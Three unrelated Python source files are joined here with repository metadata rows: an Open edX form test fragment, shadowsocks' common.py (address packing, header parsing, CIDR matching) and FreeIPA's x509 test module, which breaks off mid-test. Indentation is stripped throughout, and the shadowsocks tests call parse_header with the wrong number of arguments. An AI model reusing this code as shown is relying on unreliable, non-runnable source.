def test_other_user_by_staff(self):
self.initial = {'requesting_user': self.staff}
self.get_form(expected_valid=True)
def test_unenrolled_student(self):
CourseEnrollment.unenroll(self.student, self.course.id)
self.assert_raises_permission_denied()
def test_unenrolled_staff(self):
CourseEnrollment.unenroll(self.staff, self.course.id)
self.initial = {'requesting_user': self.staff}
self.form_data['username'] = self.staff.username
self.get_form(expected_valid=True)
def test_unenrolled_student_by_staff(self):
CourseEnrollment.unenroll(self.student, self.course.id)
self.initial = {'requesting_user': self.staff}
self.get_form(expected_valid=True)
#-- depth
def test_depth_integer(self):
self.form_data['depth'] = 3
self.cleaned_data['depth'] = 3
self.assert_equals_cleaned_data()
def test_depth_all(self):
self.form_data['depth'] = 'all'
self.cleaned_data['depth'] = None
self.assert_equals_cleaned_data()
def test_depth_invalid(self):
self.form_data['depth'] = 'not_an_integer'
self.assert_error('depth', "'not_an_integer' is not a valid depth value.")
#-- nav depth
def test_nav_depth(self):
self.form_data['nav_depth'] = 3
self.cleaned_data['nav_depth'] = 3
self.cleaned_data['requested_fields'] |= {'nav_depth'}
self.assert_equals_cleaned_data()
def test_nav_depth_invalid(self):
self.form_data['nav_depth'] = 'not_an_integer'
self.assert_error('nav_depth', "Enter a whole number.")
def test_nav_depth_negative(self):
self.form_data['nav_depth'] = -1
self.assert_error('nav_depth', "Ensure this value is greater than or equal to 0.")
#-- return_type
def test_return_type(self):
self.form_data['return_type'] = 'list'
self.cleaned_data['return_type'] = 'list'
self.assert_equals_cleaned_data()
def test_return_type_invalid(self):
self.form_data['return_type'] = 'invalid_return_type'
self.assert_error(
'return_type',
"Select a valid choice. invalid_return_type is not one of the available choices."
)
#-- requested fields
def test_requested_fields(self):
self.form_data.setlist('requested_fields', ['graded', 'nav_depth', 'some_other_field'])
self.cleaned_data['requested_fields'] |= {'graded', 'nav_depth', 'some_other_field'}
self.assert_equals_cleaned_data()
@ddt.data('block_counts', 'student_view_data')
def test_higher_order_field(self, field_name):
field_value = {'block_type1', 'block_type2'}
self.form_data.setlist(field_name, field_value)
self.cleaned_data[field_name] = field_value
self.cleaned_data['requested_fields'].add(field_name)
self.assert_equals_cleaned_data()
def test_combined_fields(self):
# add requested fields
self.form_data.setlist('requested_fields', ['field1', 'field2'])
# add higher order fields
block_types_list = {'block_type1', 'block_type2'}
for field_name in ['block_counts', 'student_view_data']:
self.form_data.setlist(field_name, block_types_list)
self.cleaned_data[field_name] = block_types_list
# verify the requested_fields in cleaned_data includes all fields
self.cleaned_data['requested_fields'] |= {'field1', 'field2', 'student_view_data', 'block_counts'}
self.assert_equals_cleaned_data()
| agpl-3.0 | 6,443,629,654,869,371,000 | 34.39749 | 114 | 0.635697 | false |
serika00/shadowsocks | shadowsocks/common.py | 1 | 9079 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2013-2015 clowwindy
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import, division, print_function, \
with_statement
import socket
import struct
import logging
def compat_ord(s):
if type(s) == int:
return s
return _ord(s)
def compat_chr(d):
if bytes == str:
return _chr(d)
return bytes([d])
_ord = ord
_chr = chr
ord = compat_ord
chr = compat_chr
def to_bytes(s):
if bytes != str:
if type(s) == str:
return s.encode('utf-8')
return s
def to_str(s):
if bytes != str:
if type(s) == bytes:
return s.decode('utf-8')
return s
def inet_ntop(family, ipstr):
if family == socket.AF_INET:
return to_bytes(socket.inet_ntoa(ipstr))
elif family == socket.AF_INET6:
import re
v6addr = ':'.join(('%02X%02X' % (ord(i), ord(j))).lstrip('0')
for i, j in zip(ipstr[::2], ipstr[1::2]))
v6addr = re.sub('::+', '::', v6addr, count=1)
return to_bytes(v6addr)
def inet_pton(family, addr):
addr = to_str(addr)
if family == socket.AF_INET:
return socket.inet_aton(addr)
elif family == socket.AF_INET6:
if '.' in addr: # a v4 addr
v4addr = addr[addr.rindex(':') + 1:]
v4addr = socket.inet_aton(v4addr)
v4addr = map(lambda x: ('%02X' % ord(x)), v4addr)
v4addr.insert(2, ':')
newaddr = addr[:addr.rindex(':') + 1] + ''.join(v4addr)
return inet_pton(family, newaddr)
dbyts = [0] * 8 # 8 groups
grps = addr.split(':')
for i, v in enumerate(grps):
if v:
dbyts[i] = int(v, 16)
else:
for j, w in enumerate(grps[::-1]):
if w:
dbyts[7 - j] = int(w, 16)
else:
break
break
return b''.join((chr(i // 256) + chr(i % 256)) for i in dbyts)
else:
raise RuntimeError("What family?")
def is_ip(address):
for family in (socket.AF_INET, socket.AF_INET6):
try:
if type(address) != str:
address = address.decode('utf8')
inet_pton(family, address)
return family
except (TypeError, ValueError, OSError, IOError):
pass
return False
def patch_socket():
if not hasattr(socket, 'inet_pton'):
socket.inet_pton = inet_pton
if not hasattr(socket, 'inet_ntop'):
socket.inet_ntop = inet_ntop
patch_socket()
ADDRTYPE_IPV4 = 1
ADDRTYPE_IPV6 = 4
ADDRTYPE_HOST = 3
def pack_addr(address):
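    """Pack an address into the wire format: a type byte (IPv4/IPv6/host)
    followed by the packed address bytes.
    """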
address_str = to_str(address)
for family in (socket.AF_INET, socket.AF_INET6):
try:
r = socket.inet_pton(family, address_str)
if family == socket.AF_INET6:
return b'\x04' + r
else:
return b'\x01' + r
except (TypeError, ValueError, OSError, IOError):
pass
if len(address) > 255:
address = address[:255] # TODO
return b'\x03' + chr(len(address)) + address
def parse_header(data, block_pattern):
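    """Parse the request header into (addrtype, dest_addr, dest_port,
    header_length), returning None if the header is malformed. Destinations
    matching block_pattern are rewritten to 127.0.0.1.
    """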
addrtype = ord(data[0])
dest_addr = None
dest_port = None
header_length = 0
if addrtype == ADDRTYPE_IPV4:
if len(data) >= 7:
dest_addr = socket.inet_ntoa(data[1:5])
dest_port = struct.unpack('>H', data[5:7])[0]
header_length = 7
else:
logging.warn('header is too short')
elif addrtype == ADDRTYPE_HOST:
if len(data) > 2:
addrlen = ord(data[1])
if len(data) >= 2 + addrlen:
dest_addr = data[2:2 + addrlen]
dest_port = struct.unpack('>H', data[2 + addrlen:4 +
addrlen])[0]
header_length = 4 + addrlen
else:
logging.warn('header is too short')
else:
logging.warn('header is too short')
elif addrtype == ADDRTYPE_IPV6:
if len(data) >= 19:
dest_addr = socket.inet_ntop(socket.AF_INET6, data[1:17])
dest_port = struct.unpack('>H', data[17:19])[0]
header_length = 19
else:
logging.warn('header is too short')
else:
logging.warn('unsupported addrtype %d, maybe wrong password or '
'encryption method' % addrtype)
if dest_addr is None:
return None
dest_addr = to_bytes(dest_addr)
if block_pattern.match(dest_addr) != None:
print('deny ' + dest_addr)
dest_addr = '127.0.0.1'
return addrtype, dest_addr, dest_port, header_length
class IPNetwork(object):
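    """A set of IPv4/IPv6 networks in CIDR notation supporting membership
    tests with the ``in`` operator.
    """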
ADDRLENGTH = {socket.AF_INET: 32, socket.AF_INET6: 128, False: 0}
def __init__(self, addrs):
self._network_list_v4 = []
self._network_list_v6 = []
if type(addrs) == str:
addrs = addrs.split(',')
list(map(self.add_network, addrs))
def add_network(self, addr):
        if addr == "":
return
block = addr.split('/')
addr_family = is_ip(block[0])
addr_len = IPNetwork.ADDRLENGTH[addr_family]
if addr_family is socket.AF_INET:
ip, = struct.unpack("!I", socket.inet_aton(block[0]))
elif addr_family is socket.AF_INET6:
hi, lo = struct.unpack("!QQ", inet_pton(addr_family, block[0]))
ip = (hi << 64) | lo
else:
raise Exception("Not a valid CIDR notation: %s" % addr)
        if len(block) == 1:
            prefix_size = 0
            while (ip & 1) == 0 and ip != 0:
                ip >>= 1
                prefix_size += 1
            logging.warn("You didn't specify CIDR routing prefix size for %s, "
                         "implicitly treated as %s/%d" % (addr, addr, addr_len))
elif block[1].isdigit() and int(block[1]) <= addr_len:
prefix_size = addr_len - int(block[1])
ip >>= prefix_size
else:
raise Exception("Not a valid CIDR notation: %s" % addr)
if addr_family is socket.AF_INET:
self._network_list_v4.append((ip, prefix_size))
else:
self._network_list_v6.append((ip, prefix_size))
def __contains__(self, addr):
addr_family = is_ip(addr)
if addr_family is socket.AF_INET:
ip, = struct.unpack("!I", socket.inet_aton(addr))
return any(map(lambda n_ps: n_ps[0] == ip >> n_ps[1],
self._network_list_v4))
elif addr_family is socket.AF_INET6:
hi, lo = struct.unpack("!QQ", inet_pton(addr_family, addr))
ip = (hi << 64) | lo
return any(map(lambda n_ps: n_ps[0] == ip >> n_ps[1],
self._network_list_v6))
else:
return False
def test_inet_conv():
ipv4 = b'8.8.4.4'
b = inet_pton(socket.AF_INET, ipv4)
assert inet_ntop(socket.AF_INET, b) == ipv4
ipv6 = b'2404:6800:4005:805::1011'
b = inet_pton(socket.AF_INET6, ipv6)
assert inet_ntop(socket.AF_INET6, b) == ipv6
def test_parse_header():
assert parse_header(b'\x03\x0ewww.google.com\x00\x50') == \
(3, b'www.google.com', 80, 18)
assert parse_header(b'\x01\x08\x08\x08\x08\x00\x35') == \
(1, b'8.8.8.8', 53, 7)
assert parse_header((b'\x04$\x04h\x00@\x05\x08\x05\x00\x00\x00\x00\x00'
b'\x00\x10\x11\x00\x50')) == \
(4, b'2404:6800:4005:805::1011', 80, 19)
def test_pack_header():
assert pack_addr(b'8.8.8.8') == b'\x01\x08\x08\x08\x08'
assert pack_addr(b'2404:6800:4005:805::1011') == \
b'\x04$\x04h\x00@\x05\x08\x05\x00\x00\x00\x00\x00\x00\x10\x11'
assert pack_addr(b'www.google.com') == b'\x03\x0ewww.google.com'
def test_ip_network():
ip_network = IPNetwork('127.0.0.0/24,::ff:1/112,::1,192.168.1.1,192.0.2.0')
assert '127.0.0.1' in ip_network
assert '127.0.1.1' not in ip_network
assert ':ff:ffff' in ip_network
assert '::ffff:1' not in ip_network
assert '::1' in ip_network
assert '::2' not in ip_network
assert '192.168.1.1' in ip_network
assert '192.168.1.2' not in ip_network
assert '192.0.2.1' in ip_network
assert '192.0.3.1' in ip_network # 192.0.2.0 is treated as 192.0.2.0/23
assert 'www.google.com' not in ip_network
if __name__ == '__main__':
test_inet_conv()
test_parse_header()
test_pack_header()
test_ip_network()
| apache-2.0 | 8,077,218,631,892,797,000 | 30.524306 | 79 | 0.544223 | false |
encukou/freeipa | ipatests/test_ipalib/test_x509.py | 2 | 16469 | # Authors:
# Rob Crittenden <[email protected]>
#
# Copyright (C) 2010 Red Hat
# see file 'COPYING' for use and warranty information
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
Test the `ipalib.x509` module.
"""
import base64
from binascii import hexlify
from configparser import RawConfigParser
import datetime
from io import StringIO
import pickle
import pytest
from cryptography import x509 as crypto_x509
from cryptography.x509.general_name import DNSName
from ipalib import x509
from ipapython.dn import DN
pytestmark = pytest.mark.tier0
# certutil -
# certificate for CN=ipa.example.com,O=IPA
goodcert = (
b'MIICAjCCAWugAwIBAgICBEUwDQYJKoZIhvcNAQEFBQAwKTEnMCUGA1UEAxMeSVBB'
b'IFRlc3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5MB4XDTEwMDYyNTEzMDA0MloXDTE1'
b'MDYyNTEzMDA0MlowKDEMMAoGA1UEChMDSVBBMRgwFgYDVQQDEw9pcGEuZXhhbXBs'
b'ZS5jb20wgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJcZ+H6+cQaN/BlzR8OY'
b'kVeJgaU5tCaV9FF1m7Ws/ftPtTJUaSL1ncp6603rjA4tH1aa/B8i8xdC46+ZbY2a'
b'u8b9ryGcOsx2uaRpNLEQ2Fy//q1kQC8oM+iD8Nd6osF0a2wnugsgnJHPuJzhViaW'
b'xYgzk5DRdP81debokF3f3FX/AgMBAAGjOjA4MBEGCWCGSAGG+EIBAQQEAwIGQDAT'
b'BgNVHSUEDDAKBggrBgEFBQcDATAOBgNVHQ8BAf8EBAMCBPAwDQYJKoZIhvcNAQEF'
b'BQADgYEALD6X9V9w381AzzQPcHsjIjiX3B/AF9RCGocKZUDXkdDhsD9NZ3PLPEf1'
b'AMjkraKG963HPB8scyiBbbSuSh6m7TCp0eDgRpo77zNuvd3U4Qpm0Qk+KEjtHQDj'
b'NNG6N4ZnCQPmjFPScElvc/GgW7XMbywJy2euF+3/Uip8cnPgSH4='
)
goodcert_headers = (
b'-----BEGIN CERTIFICATE-----\n' +
goodcert +
b'\n-----END CERTIFICATE-----'
)
# The base64-encoded string 'bad cert'
badcert = (
b'-----BEGIN CERTIFICATE-----\n'
b'YmFkIGNlcnQ=\r\n'
b'-----END CERTIFICATE-----'
)
good_pkcs7 = (
b'-----BEGIN PKCS7-----\n'
b'MIIDvAYJKoZIhvcNAQcCoIIDrTCCA6kCAQExADALBgkqhkiG9w0BBwGgggOPMIID\n'
b'izCCAnOgAwIBAgIBATANBgkqhkiG9w0BAQsFADA2MRQwEgYDVQQKDAtFWEFNUExF\n'
b'LkNPTTEeMBwGA1UEAwwVQ2VydGlmaWNhdGUgQXV0aG9yaXR5MB4XDTE3MDkyMDIw\n'
b'NDI1N1oXDTM3MDkyMDIwNDI1N1owNjEUMBIGA1UECgwLRVhBTVBMRS5DT00xHjAc\n'
b'BgNVBAMMFUNlcnRpZmljYXRlIEF1dGhvcml0eTCCASIwDQYJKoZIhvcNAQEBBQAD\n'
b'ggEPADCCAQoCggEBAMNojX57UCCPTtEn9tQJBS4By5NixwodKm1UqOGsiecDrB0i\n'
b'Pw7D6uGP6g4b6srYtbh+YsRJnfekB2L08q1dX3LVEItq2TS0WKqgZuRZkw7DvnGl\n'
b'eANMwjHmE8k6/E0yI3GGxJLAfDZYw6CDspLkyN9anjQwVCz5N5z5bpeqi5BeVwin\n'
b'O8WVF6FNn3iyL66uwOsTGEzCo3Y5HiwqYgaND73TtdsBHcIqOdRql3CC3IdoXXcW\n'
b'044w4Lm2E95MuY729pPBHREtyzVkYtyuoKJ8KApghIY5oCklBkRDjyFK4tE7iF/h\n'
b's+valeT9vcz2bHMIpvbjqAu/kqE8MjcNEFPjLhcCAwEAAaOBozCBoDAfBgNVHSME\n'
b'GDAWgBTUB04/d1eLhbMtBi4AB65tsAt+2TAPBgNVHRMBAf8EBTADAQH/MA4GA1Ud\n'
b'DwEB/wQEAwIBxjAdBgNVHQ4EFgQU1AdOP3dXi4WzLQYuAAeubbALftkwPQYIKwYB\n'
b'BQUHAQEEMTAvMC0GCCsGAQUFBzABhiFodHRwOi8vaXBhLWNhLmdyZXlvYWsuY29t\n'
b'L2NhL29jc3AwDQYJKoZIhvcNAQELBQADggEBADQFwX1uh8tqLq8SqWZWtH95j33o\n'
b'5Ze2dW7sVppb/wVnNauG0wDQW7uIx+Ynr7GgufXLNBMn1aP/mA2CdHk7NZz2IB1s\n'
b'ZvbIfE8dVxzkA+Hh9d6cdgk4eU5rGf6Fw8ScEJ/48Mmncea3uGkHcOmt+BGLA8a1\n'
b'wtruy+iQylOkbv36CbxKV7IsZDP106Zc+cVeOUQZnCLKmvQkotn6UJd8N1X0R2J3\n'
b'4/qv0rUtcCnyEBNSgpTGCRlYM4kd98Dqc5W7wUpMcsQMFxQMSYY7pFQkdLPfJEx2\n'
b'Mg63SPawxfAgUeukrdsF3wTIKkIBu1TVse+kvRvgmRRrfF2a4ZOv5qORe2uhADEA\n'
b'-----END PKCS7-----'
)
long_oid_cert = b'''
-----BEGIN CERTIFICATE-----
MIIFiTCCBHGgAwIBAgITSAAAAAd1bEC5lsOdnQAAAAAABzANBgkqhkiG9w0BAQsF
ADBLMRUwEwYKCZImiZPyLGQBGRYFbG9jYWwxEjAQBgoJkiaJk/IsZAEZFgJhZDEe
MBwGA1UEAxMVYWQtV0lOLVBQSzAxNUY5TURRLUNBMB4XDTE3MDUyNTIzNDg0NVoX
DTE5MDUyNTIzNTg0NVowNDESMBAGA1UEChMJSVBBLkxPQ0FMMR4wHAYDVQQDExVD
ZXJ0aWZpY2F0ZSBBdXRob3JpdHkwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEK
AoIBAQDyyuty6irlL89hdaSW0UyAGLsOOMgAuJwBAeuRUorR159rsSnUXLcTHIsm
EszKhwxp3NkkawRWx/s0UN1m2+RUwMl6gvlw+G80Mz0S77C77M+2lO8HRmZGm+Wu
zBNcc9SANHuDQ1NISfZgLiscMS0+l0T3g6/Iqtg1kPWrq/tMevfh6tJEIedSBGo4
3xKEMSDkrvaeTuSVrgn/QT0m+WNccZa0c7X35L/hgR22/l5sr057Ef8F9vL8zUH5
TttFBIuiWJo8A8XX9I1zYIFhWjW3OVDZPBUnhGHH6yNyXGxXMRfcrrc74eTw8ivC
080AQuRtgwvDErB/JPDJ5w5t/ielAgMBAAGjggJ7MIICdzA9BgkrBgEEAYI3FQcE
MDAuBiYrBgEEAYI3FQiEoqJGhYq1PoGllQqGi+F4nacAgRODs5gfgozzAAIBZAIB
BTAPBgNVHRMBAf8EBTADAQH/MA4GA1UdDwEB/wQEAwIBhjAdBgNVHQ4EFgQUnSrC
yW3CR0e3ilJdN6kL06P3KHMwHwYDVR0jBBgwFoAUj69xtyUNwp8on+NWO+HlxKyg
X7AwgdgGA1UdHwSB0DCBzTCByqCBx6CBxIaBwWxkYXA6Ly8vQ049YWQtV0lOLVBQ
SzAxNUY5TURRLUNBLENOPVdJTi1QUEswMTVGOU1EUSxDTj1DRFAsQ049UHVibGlj
JTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixE
Qz1hZCxEQz1sb2NhbD9jZXJ0aWZpY2F0ZVJldm9jYXRpb25MaXN0P2Jhc2U/b2Jq
ZWN0Q2xhc3M9Y1JMRGlzdHJpYnV0aW9uUG9pbnQwgcQGCCsGAQUFBwEBBIG3MIG0
MIGxBggrBgEFBQcwAoaBpGxkYXA6Ly8vQ049YWQtV0lOLVBQSzAxNUY5TURRLUNB
LENOPUFJQSxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxD
Tj1Db25maWd1cmF0aW9uLERDPWFkLERDPWxvY2FsP2NBQ2VydGlmaWNhdGU/YmFz
ZT9vYmplY3RDbGFzcz1jZXJ0aWZpY2F0aW9uQXV0aG9yaXR5MDMGA1UdIAQsMCow
KAYmKwYBBAGCNxUIhKKiRoWKtT6BpZUKhovheJ2nAIEThrXzUYabpA4wDQYJKoZI
hvcNAQELBQADggEBAIsFS+Qc/ufTrkuHbMmzksOpxq+OIi9rot8zy9/1Vmj6d+iP
kB+vQ1u4/IhdQArJFNhsBzWSY9Pi8ZclovpepFeEZfXPUenyeRCU43HdMXcHXnlP
YZfyLQWOugdo1WxK6S9qQSOSlC7BSGZWvKkiAPAwr4zNbbS+ROA2w0xaYMv0rr5W
A4UAyzZAdqaGRJBRvCZ/uFHM5wMw0LzNCL4CqKW9jfZX0Fc2tdGx8zbTYxIdgr2D
PL25as32r3S/m4uWqoQaK0lxK5Y97eusK2rrmidy32Jctzwl29UWq8kpjRAuD8iR
CSc7sKqOf+fn3+fKITR2/DcSVvb0SGCr5fVVnjQ=
-----END CERTIFICATE-----
'''
ipa_demo_crt = b'''\
-----BEGIN CERTIFICATE-----
MIIGFTCCBP2gAwIBAgISA61CoqWtpZoTEyfLCXliPLYFMA0GCSqGSIb3DQEBCwUA
MEoxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MSMwIQYDVQQD
ExpMZXQncyBFbmNyeXB0IEF1dGhvcml0eSBYMzAeFw0xODA3MjUwNTM2NTlaFw0x
ODEwMjMwNTM2NTlaMCAxHjAcBgNVBAMTFWlwYS5kZW1vMS5mcmVlaXBhLm9yZzCC
ASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAKisvYUdarWE0CS9i+RcNf9Q
41Euw36R4Myf/PUCDVUvGsVXQWSCanbtyxa8Ows4cAHrfqhiKAnSg0IhLqCMJVQ8
8F699FHrP9EfPmZkG3RMLYPxKNrSmOVyNpIEQY9qfkDXZPLung6dk/c225Znoltq
bVWLObXA7eP9C/djupg3gUD7vOAMHFmfZ3OKnx1uktL5p707o2/qlkSiEO4Z5ebD
M8X0dTkN8V3LCCOjzCp88itGUWJM8Tjb86WkmYkJxmeZx6REd37rDXjqgYhwgXOB
bSqDkYKRaihwvd5Up/vE1wApBS1k7b1oEW80teDUbzbaaqp7oBWbZD2Ac1yJF7UC
AwEAAaOCAx0wggMZMA4GA1UdDwEB/wQEAwIFoDAdBgNVHSUEFjAUBggrBgEFBQcD
AQYIKwYBBQUHAwIwDAYDVR0TAQH/BAIwADAdBgNVHQ4EFgQUUmTMI1CB6qFMXc0+
AGmqpfBAwhIwHwYDVR0jBBgwFoAUqEpqYwR93brm0Tm3pkVl7/Oo7KEwbwYIKwYB
BQUHAQEEYzBhMC4GCCsGAQUFBzABhiJodHRwOi8vb2NzcC5pbnQteDMubGV0c2Vu
Y3J5cHQub3JnMC8GCCsGAQUFBzAChiNodHRwOi8vY2VydC5pbnQteDMubGV0c2Vu
Y3J5cHQub3JnLzAgBgNVHREEGTAXghVpcGEuZGVtbzEuZnJlZWlwYS5vcmcwgf4G
A1UdIASB9jCB8zAIBgZngQwBAgEwgeYGCysGAQQBgt8TAQEBMIHWMCYGCCsGAQUF
BwIBFhpodHRwOi8vY3BzLmxldHNlbmNyeXB0Lm9yZzCBqwYIKwYBBQUHAgIwgZ4M
gZtUaGlzIENlcnRpZmljYXRlIG1heSBvbmx5IGJlIHJlbGllZCB1cG9uIGJ5IFJl
bHlpbmcgUGFydGllcyBhbmQgb25seSBpbiBhY2NvcmRhbmNlIHdpdGggdGhlIENl
cnRpZmljYXRlIFBvbGljeSBmb3VuZCBhdCBodHRwczovL2xldHNlbmNyeXB0Lm9y
Zy9yZXBvc2l0b3J5LzCCAQQGCisGAQQB1nkCBAIEgfUEgfIA8AB2AMEWSuCnctLU
OS3ICsEHcNTwxJvemRpIQMH6B1Fk9jNgAAABZNAnsSAAAAQDAEcwRQIgHkd/UkTZ
w8iV1Ox8MPHLrpY33cX6i5FV6w9+7YH3H2kCIQCVcrhsr4fokDyE2ueUqSFxkBVH
WND84/w5rFNAPjyO1QB2ACk8UZZUyDlluqpQ/FgH1Ldvv1h6KXLcpMMM9OVFR/R4
AAABZNAnsyUAAAQDAEcwRQIhALDWY2k55abu7IPwnFvMr4Zqd1DYQXEKWZEQLXUP
s4XGAiAabjpUwrLKVXpbp4WNLkTNlFjrSJafOzLG68H9AnoD4zANBgkqhkiG9w0B
AQsFAAOCAQEAfBNuQn/A2olJHxoBGLfMcQCkkNOfvBpfQeKgni2VVM+r1ZY8YVXx
OtVnV6XQ5M+l+6xlRpP1IwDdmJd/yaQgwbmYf4zl94W/s/qq4nlTd9G4ahmJOhlc
mWeIQMoEtAmQlIOqWto+Knfakz6Xyo+HVCQEyeoBmYFGZcakeAm6tp/6qtpkej+4
wBjShMPAdSYDPRaAqnZ3BAK2UmmlpAA5tkNvqOaHBCi760zYoxT6j1an7FotG0v9
2+W0aL34eMWKz/g4qhwk+Jiz45LLQWhHGIgXIUoNSzHgLIVuVOQI8DPsguvT6GHW
QUs1Hx1wL7mL4U8fKCFDKA+ds2B2xWgoZg==
-----END CERTIFICATE-----
'''
class test_x509:
"""
Test `ipalib.x509`
I created the contents of this certificate with a self-signed CA with:
% certutil -R -s "CN=ipa.example.com,O=IPA" -d . -a -o example.csr
% ./ipa host-add ipa.example.com
% ./ipa cert-request --add --principal=test/ipa.example.com example.csr
"""
def test_1_load_base64_cert(self):
"""
Test loading a base64-encoded certificate.
"""
# Load a good cert
x509.load_pem_x509_certificate(goodcert_headers)
# Load a good cert with headers and leading text
newcert = (
b'leading text\n' + goodcert_headers)
x509.load_pem_x509_certificate(newcert)
# Load a good cert with bad headers
newcert = b'-----BEGIN CERTIFICATE-----' + goodcert_headers
with pytest.raises((TypeError, ValueError)):
x509.load_pem_x509_certificate(newcert)
# Load a bad cert
with pytest.raises(ValueError):
x509.load_pem_x509_certificate(badcert)
def test_1_load_der_cert(self):
"""
Test loading a DER certificate.
"""
der = base64.b64decode(goodcert)
# Load a good cert
x509.load_der_x509_certificate(der)
def test_3_cert_contents(self):
"""
Test the contents of a certificate
"""
# Verify certificate contents. This exercises python-cryptography
# more than anything but confirms our usage of it.
not_before = datetime.datetime(2010, 6, 25, 13, 0, 42)
not_after = datetime.datetime(2015, 6, 25, 13, 0, 42)
cert = x509.load_pem_x509_certificate(goodcert_headers)
assert DN(cert.subject) == DN(('CN', 'ipa.example.com'), ('O', 'IPA'))
assert DN(cert.issuer) == DN(('CN', 'IPA Test Certificate Authority'))
assert cert.serial_number == 1093
assert cert.not_valid_before == not_before
assert cert.not_valid_after == not_after
assert cert.san_general_names == []
assert cert.san_a_label_dns_names == []
assert cert.extended_key_usage == {'1.3.6.1.5.5.7.3.1'}
assert cert.extended_key_usage_bytes == (
b'0\x16\x06\x03U\x1d%\x01\x01\xff\x04\x0c0\n\x06\x08'
b'+\x06\x01\x05\x05\x07\x03\x01'
)
def test_load_pkcs7_pem(self):
certlist = x509.pkcs7_to_certs(good_pkcs7, datatype=x509.PEM)
assert len(certlist) == 1
cert = certlist[0]
assert DN(cert.subject) == DN('CN=Certificate Authority,O=EXAMPLE.COM')
assert cert.serial_number == 1
def test_long_oid(self):
"""
        Test certificate with a very long OID. In this case we are using a
        certificate from an opened case where one of the X509v3 Certificate
        Policies OIDs is longer than 80 chars.
"""
cert = x509.load_pem_x509_certificate(long_oid_cert)
ext = cert.extensions.get_extension_for_class(crypto_x509.
CertificatePolicies)
assert len(ext.value) == 1
assert ext.value[0].policy_identifier.dotted_string == (
u'1.3.6.1.4.1.311.21.8.8950086.10656446.2706058.12775672.480128.'
'147.13466065.13029902')
def test_ipa_demo_letsencrypt(self):
cert = x509.load_pem_x509_certificate(ipa_demo_crt)
assert DN(cert.subject) == DN('CN=ipa.demo1.freeipa.org')
assert DN(cert.issuer) == DN(
"CN=Let's Encrypt Authority X3,O=Let's Encrypt,C=US")
assert cert.serial_number == 0x03ad42a2a5ada59a131327cb0979623cb605
not_before = datetime.datetime(2018, 7, 25, 5, 36, 59)
not_after = datetime.datetime(2018, 10, 23, 5, 36, 59)
assert cert.not_valid_before == not_before
assert cert.not_valid_after == not_after
assert cert.san_general_names == [DNSName('ipa.demo1.freeipa.org')]
assert cert.san_a_label_dns_names == ['ipa.demo1.freeipa.org']
assert cert.extended_key_usage == {
'1.3.6.1.5.5.7.3.1', '1.3.6.1.5.5.7.3.2'
}
assert cert.extended_key_usage_bytes == (
b'0 \x06\x03U\x1d%\x01\x01\xff\x04\x160\x14\x06\x08+\x06\x01'
b'\x05\x05\x07\x03\x01\x06\x08+\x06\x01\x05\x05\x07\x03\x02'
)
class test_ExternalCAProfile:
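    """
    Tests for ExternalCAProfile and the MSCSTemplate classes.
    """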
def test_MSCSTemplateV1_good(self):
o = x509.MSCSTemplateV1("MySubCA")
assert hexlify(o.get_ext_data()) == b'1e0e004d007900530075006200430041'
def test_MSCSTemplateV1_bad(self):
with pytest.raises(ValueError):
x509.MSCSTemplateV1("MySubCA:1")
def test_MSCSTemplateV1_pickle_roundtrip(self):
o = x509.MSCSTemplateV1("MySubCA")
s = pickle.dumps(o)
assert o.get_ext_data() == pickle.loads(s).get_ext_data()
def test_MSCSTemplateV2_too_few_parts(self):
with pytest.raises(ValueError):
x509.MSCSTemplateV2("1.2.3.4")
def test_MSCSTemplateV2_too_many_parts(self):
with pytest.raises(ValueError):
x509.MSCSTemplateV2("1.2.3.4:100:200:300")
def test_MSCSTemplateV2_bad_oid(self):
with pytest.raises(ValueError):
x509.MSCSTemplateV2("not_an_oid:1")
def test_MSCSTemplateV2_non_numeric_major_version(self):
with pytest.raises(ValueError):
x509.MSCSTemplateV2("1.2.3.4:major:200")
def test_MSCSTemplateV2_non_numeric_minor_version(self):
with pytest.raises(ValueError):
x509.MSCSTemplateV2("1.2.3.4:100:minor")
def test_MSCSTemplateV2_major_version_lt_zero(self):
with pytest.raises(ValueError):
x509.MSCSTemplateV2("1.2.3.4:-1:200")
def test_MSCSTemplateV2_minor_version_lt_zero(self):
with pytest.raises(ValueError):
x509.MSCSTemplateV2("1.2.3.4:100:-1")
def test_MSCSTemplateV2_major_version_gt_max(self):
with pytest.raises(ValueError):
x509.MSCSTemplateV2("1.2.3.4:4294967296:200")
def test_MSCSTemplateV2_minor_version_gt_max(self):
with pytest.raises(ValueError):
x509.MSCSTemplateV2("1.2.3.4:100:4294967296")
def test_MSCSTemplateV2_good_major(self):
o = x509.MSCSTemplateV2("1.2.3.4:4294967295")
assert hexlify(o.get_ext_data()) == b'300c06032a0304020500ffffffff'
def test_MSCSTemplateV2_good_major_minor(self):
o = x509.MSCSTemplateV2("1.2.3.4:4294967295:0")
assert hexlify(o.get_ext_data()) \
== b'300f06032a0304020500ffffffff020100'
def test_MSCSTemplateV2_pickle_roundtrip(self):
o = x509.MSCSTemplateV2("1.2.3.4:4294967295:0")
s = pickle.dumps(o)
assert o.get_ext_data() == pickle.loads(s).get_ext_data()
def test_ExternalCAProfile_dispatch(self):
"""
Test that constructing ExternalCAProfile actually returns an
instance of the appropriate subclass.
"""
